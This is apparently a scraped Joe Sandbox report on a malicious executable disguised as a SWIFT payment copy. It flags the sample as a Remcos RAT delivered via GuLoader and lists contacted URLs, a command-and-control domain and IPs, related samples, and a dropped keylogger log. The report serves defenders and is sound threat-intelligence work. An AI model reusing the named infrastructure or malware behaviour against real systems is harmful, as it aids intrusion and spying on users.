                                                                                                                    https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhvD739.tmp.3.drfalse
                                                                                                                      		high
                                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhvD739.tmp.3.drfalse
                                                                                                                        		high
                                                                                                                        https://aefd.nelreports.net/api/report?cat=bingrmsbhvD739.tmp.3.drfalse
                                                                                                                          		high
                                                                                                                          https://www.google.com/accounts/serviceloginz58Swiftcopy_MT.bat.exefalse
                                                                                                                            		high
                                                                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhvD739.tmp.3.drfalse
                                                                                                                              		high
                                                                                                                              https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1bhvD739.tmp.3.drfalse
                                                                                                                                		high
                                                                                                                                http://crl.pki.goog/gsr1/gsr1.crl0;bhvD739.tmp.3.drfalse
                                                                                                                                  		high
                                                                                                                                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhvD739.tmp.3.drfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.godaddy.com/gdig2s1-2558.crl0bhvD739.tmp.3.drfalse
                                                                                                                                      		high
                                                                                                                                      http://ocsp.sectigo.com0bhvD739.tmp.3.drfalse
                                                                                                                                        		high
                                                                                                                                        http://certificates.godaddy.com/repository/0bhvD739.tmp.3.drfalse
                                                                                                                                          		high
                                                                                                                                          https://aefd.nelreports.net/api/report?cat=bingthbhvD739.tmp.3.drfalse
                                                                                                                                            		high
                                                                                                                                            https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhvD739.tmp.3.drfalse
                                                                                                                                              		high
                                                                                                                                              https://eb2.3lift.com/sync?z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                		high
                                                                                                                                                https://acdn.adnxs.com/dmp/async_usersync.htmlbhvD739.tmp.3.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvD739.tmp.3.drfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comz58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZEbhvD739.tmp.3.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhvD739.tmp.3.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhvD739.tmp.3.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://pki.goog/repo/certs/gts1c3.der07bhvD739.tmp.3.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4b&bhvD739.tmp.3.drfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdz58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvD739.tmp.3.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhvD739.tmp.3.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://c.pki.goog/r/r1.crl0bhvD739.tmp.3.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhvD739.tmp.3.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.msn.com/de-ch/?ocid=iehpbhvD739.tmp.3.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5QbhvD739.tmp.3.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhvD739.tmp.3.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhvD739.tmp.3.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvD739.tmp.3.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhvD739.tmp.3.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhvD739.tmp.3.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&connbhvD739.tmp.3.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://dsm09prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?8f6ec558c7d1c621e0d5881446d586b0bhvD739.tmp.3.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/pagead/drt/uiz58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhvD739.tmp.3.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1bhvD739.tmp.3.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhvD739.tmp.3.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://pki.goog/repo/certs/gts1c3.der0$bhvD739.tmp.3.drfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          109.99.162.14
                                                                                                                                                                                                          		teldrum.roRomania
                                                                                                                                                                                                          		9050RTDBucharestRomaniaROfalse
                                                                                                                                                                                                          178.237.33.50
                                                                                                                                                                                                          		geoplugin.netNetherlands
                                                                                                                                                                                                          		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                                          43.226.229.196
                                                                                                                                                                                                          		wealthabundance01.duckdns.orgHong Kong
                                                                                                                                                                                                          		36351SOFTLAYERUStrue

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1586058
                                                                                                                                                                                                          Start date and time:2025-01-08 17:08:47 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 15m 29s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                          Run name:Suspected Instruction Hammering
                                                                                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Sample name:z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@9/12@3/3
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 95%
                                                                                                                                                                                                          • Number of executed functions: 171
                                                                                                                                                                                                          • Number of non-executed functions: 323
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.113.194.132
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ecs.office.com, ctldl.windowsupdate.com
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                          • VT rate limit hit for: z58Swiftcopy_MT.bat.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          11:13:46API Interceptor24348582x Sleep call for process: z58Swiftcopy_MT.bat.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          109.99.162.14DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            DHL_119040 receipt document,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  178.237.33.50173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  teldrum.roDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  wealthabundance01.duckdns.orgDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.204
                                                                                                                                                                                                                  geoplugin.net173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  SOFTLAYERUSDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 43.226.229.204
                                                                                                                                                                                                                  miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 165.192.65.222
                                                                                                                                                                                                                  miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 159.122.175.31
                                                                                                                                                                                                                  sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 169.60.29.133
                                                                                                                                                                                                                  miori.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 169.52.242.203
                                                                                                                                                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 209.62.54.186
                                                                                                                                                                                                                  http://gleapis.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 52.116.53.155
                                                                                                                                                                                                                  z0r0.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 150.239.155.45
                                                                                                                                                                                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 174.132.184.239
                                                                                                                                                                                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 174.123.94.89
                                                                                                                                                                                                                  RTDBucharestRomaniaRODHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 92.87.162.218
                                                                                                                                                                                                                  z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 89.122.79.113
                                                                                                                                                                                                                  Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 92.87.250.226
                                                                                                                                                                                                                  Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 89.122.79.118
                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 92.86.6.236
                                                                                                                                                                                                                  armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 86.35.171.85
                                                                                                                                                                                                                  kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 89.122.79.100
                                                                                                                                                                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                  • 92.83.7.112
                                                                                                                                                                                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 109.96.77.156
                                                                                                                                                                                                                  ATOM86-ASATOM86NL173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224ad77cf86e491faad27e4b5decf1eb0bb26f16b0527e5ef488389ba353aa3db79582.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224f7603a5c535b2b2f6cc29730626d73a967c67551d2d14f73b547fe7b5fc10393994.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  1736348224bd83df4c8d79407f8e7ac5cf8c08b59746ce37ff95772daa0a6283b50e2b0882115.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  17363482249a873460757a9239193679567953c11d17b898ff9845034e34f5d2e7f4521342673.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50
                                                                                                                                                                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 178.237.33.50

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                                  • 109.99.162.14
                                                                                                                                                                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 109.99.162.14

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dllDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                      asXlZG3aW6.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                        asXlZG3aW6.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                          aMfizaMilo.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                            1ppvR5VRT6.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                              Ozb8aojWew.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                aMfizaMilo.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  1ppvR5VRT6.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                    C:\ProgramData\remcos\logs.dat

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):320
                                                                                                                                                                                                                                    Entropy (8bit):3.4378871152755335
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:Mlsr5YcIeeDAlOWA7DxbN2fxlPym0wiDxbN2fofCm0v:tzec0WItN2LPyy4tN2WCl
                                                                                                                                                                                                                                    MD5:2D7FCA8DCCE94488B6FC7808F056C469
                                                                                                                                                                                                                                    SHA1:343B454C4836F8CE6D2258530704BBF5C70A27BB
                                                                                                                                                                                                                                    SHA-256:B2AA126953CA5603CF08A938B3CFEDC9C6E79A754C878146F6B30FDE8A6A5642
                                                                                                                                                                                                                                    SHA-512:1E0E29763291ABCDFF5671A73DEA374EC36B4D30225984FCAE8E7C7596143CD314A6B67D28C48E1DB5D3B1830580723977695EDB3421381FAF10F21C05C325CD
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:....[.2.0.2.5./.0.1./.0.8. .1.1.:.1.3.:.1.4. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.9.6.7. .m.i.n.u.t.e.s. .}.........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .6.7.7.6.4. .m.i.n.u.t.e.s. .}.....

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\json[1].json

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                    Entropy (8bit):4.998809565203531
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:tkBUMnd6CsGkMyGWKyGXPVGArwY3bMJma5HZJmGRArpv/mOAaNO+ao9W7iN5zzkR:qDdRNuKyGX85MvXhNlT3/7HAhYro
                                                                                                                                                                                                                                    MD5:FCDA5CEB9375B32B8071A0A1480863E4
                                                                                                                                                                                                                                    SHA1:BB7D14116E1F84F6AEA6BA45C660B8BB3E4659D2
                                                                                                                                                                                                                                    SHA-256:2CBF397584AC28F3810A02A7AD3C6604451C014632BF4D9F73A063C4E40DC18E
                                                                                                                                                                                                                                    SHA-512:4FDB3A7BC06185B1C9344A1F35322FA699E447FE242F33FF50EE79CB4EB451BC71F98D6F90FC50A6CDC2A82F2A7E752F583B387DE5CFA999C722FC73949A9232
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
